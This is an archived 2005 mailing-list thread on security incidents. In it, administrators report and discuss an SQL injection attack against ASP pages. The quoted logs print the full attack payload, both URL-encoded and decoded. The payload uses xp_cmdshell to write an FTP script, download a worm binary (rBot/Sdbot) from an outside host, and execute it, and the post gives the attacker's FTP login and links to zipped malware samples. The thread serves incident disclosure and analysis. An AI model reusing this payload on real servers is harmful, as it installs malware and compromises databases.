Security Incidents mailing list archives
Re: SQL injection ... another attack
From: Harlan Carvey <keydet89 () yahoo com>
Date: Thu, 20 Jan 2005 10:57:12 -0800 (PST)
I think the real issue here is that the SQL Injection worked.... --- gaurav kumar <gkverma () gmail com> wrote:
my VirusScan (network associates) detected it as W32/Sdbot.worm.gen On Wed, 19 Jan 2005 15:48:42 -0500, Maxime Ducharme <mducharme () cybergeneration com> wrote:Hi to the list today we received the same SQL injection attack on the same URL : IP : 24.1.139.29 (c-24-1-139-29.client.comcast.net) User Agent : none sent HTTP Verb : GET /theasppage.asp?anID= Attack : 377';exec MASTER..xp_cmdshell 'mkdir%systemroot%\system32\Macromed\lolx\';exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo USER chadickar0ckpaul >>%systemroot%\system32\macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo binary >> %systemroot%\system32\macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe%systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'ftp.exe -i -n -v-s:%systemroot%\system32\Macromed\lolx\blah.jkd';exec MASTER..xp_cmdshell 'del%systemroot%\system32\Macromed\lolx\blah.jkd';exec MASTER..xp_cmdshell'%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--The lol.exe file can be found in this archive forinspection :
http://www.cybergeneration.com/security/2005.01.19/lol.zip
zip pass is das978tewa234 Norton with definitions of 12 jan. doesnt findanythingsuspicious. I'm interested if someone do an analysis on thisfile.Have a nice day Maxime Ducharme Programmeur / Spécialiste en sécurité réseau ----- Original Message ----- From: "Maxime Ducharme"<mducharme () cybergeneration com>To: <full-disclosure () lists netsys com>; "GeneralDShield Discussion List"<list () lists dshield org>;<incidents () securityfocus com>Sent: Wednesday, January 05, 2005 12:22 PM Subject: SQL injection worm ?Hi list, we receveid a particular SQL injectionattackon one of our site. Attack looks like : 2005-01-05 14:39:20 24.164.202.24 - W3SVCXSRVNAME x.x.x.x 80 GET/Nouvelles.asp
id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68
%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7
8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op
en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%
5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%
68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%
5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..
%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2
5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C
system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7
8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5
Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%
78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo
t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45
%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%
5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6
3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car
cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin
e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570HTTP/1.1attacked.web.site.com - - - HTTP request contains only 2 fields (beside HTTPmethod) :Connection: Keep-Alive Host: attacked.web.site.com (I obviously replaced the name of the site). Decoded SQL injection looks like : exec MASTER..xp_cmdshell 'mkdir%systemroot%\system32\Macromed\lolx\';exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo USER hahajkhahaowned >>%systemroot%\system32\macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo get rBot.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'ftp.exe -i -n -v-s:%systemroot%\system32\Macromed\lolx\blah.jkd';exec MASTER..xp_cmdshell 'del%systemroot%\system32\Macromed\lolx\blah.jkd';exec MASTER..xp_cmdshell'%systemroot%\system32\Macromed\lolx\arcdlrde.exey.y.y.y is a foreign IP in Europe which host FTPan WWW server.I sent a notice this this site sysadmin aboutthe situation.I have been able to connect to this FTP with theaccount hahajk/hahaowned(which do not seem legit to me ...) and downloadsuspicious files.I mirrored them here :
http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
zip pass is 968goyw439807r3qw 24.164.202.24 is on rr.com networks, they havealso been advised.I know rbot.exe is known to be Randex worm, buti'd like that havesome other results / analysis. I also found a "test.asp" file which containsthe Spybot worm.Weird thing is, I searched for this hosts'sactivity on every serverand every firewall we run, and I only see 1 TCPconnection whichis the prepared SQL injections attack, nothingelse.Anybody see similar activity ? I'm asking since I want to know if we aretargeted by someone ofby a worm like Santy of use search engines tofind vulnerableASP scripts. Thanks in advance Happy new year to everyone ! Maxime Ducharme Programmeur / Spécialiste en sécurité réseau
===== ------------------------------------------ Harlan Carvey, CISSP "Windows Forensics and Incident Recovery" http://www.windows-ir.com http://windowsir.blogspot.com ------------------------------------------
Current thread:
- SQL injection ... another attack Maxime Ducharme (Jan 20)
- Re: SQL injection ... another attack Teodor Cimpoesu (Jan 20)
- Re: SQL injection ... another attack gaurav kumar (Jan 20)
- Re: SQL injection ... another attack Harlan Carvey (Jan 20)
- Re: SQL injection ... another attack Maxime Ducharme (Jan 20)
- Re: SQL injection ... another attack Harlan Carvey (Jan 20)